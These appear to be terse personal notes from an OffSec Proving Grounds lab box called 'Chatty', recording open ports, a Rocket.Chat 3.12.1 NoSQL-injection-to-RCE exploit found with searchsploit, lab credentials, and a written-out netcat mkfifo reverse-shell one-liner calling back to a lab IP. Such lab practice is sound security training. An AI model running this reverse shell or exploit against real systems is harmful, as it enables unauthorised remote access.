Chatty

Port 22 and 3000 are open

Rocket chat on port 3000

New user registered test:Test123@123

Got welcome email form admin@chatty.offsec

Found and exploit for rocket chat

Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2) searchsploit -m 50108

Created a new account with the same password as in the code.

https://al1z4deh.medium.com/proving-grounds-chatty-5b4f65588d70

Got the rev shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.177 1234 >/tmp/f

Generating ssh key as we have port 22 open